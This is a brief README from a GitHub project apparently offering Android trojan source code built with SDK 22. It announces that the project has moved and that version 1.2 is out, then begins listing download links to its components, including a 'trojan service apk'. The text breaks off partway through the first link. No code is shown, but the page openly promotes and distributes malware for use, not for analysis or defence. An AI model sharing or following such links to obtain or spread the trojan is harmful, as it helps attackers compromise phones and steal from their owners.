androidtrojan1/android_trojan/README.md

 # Android Trojan (Built with Android SDK 22) source code
 UPD.
 11.02.2016
 PROJECT MOVED!
 Version 1.2 released!

+The links to the latest and constantly updated version are below:

 HERE ARE LINKS TO ALL THE COMPONENTS:

 Actual trojan service apk: https://github.com/androidtrojan1/android-trojan-service-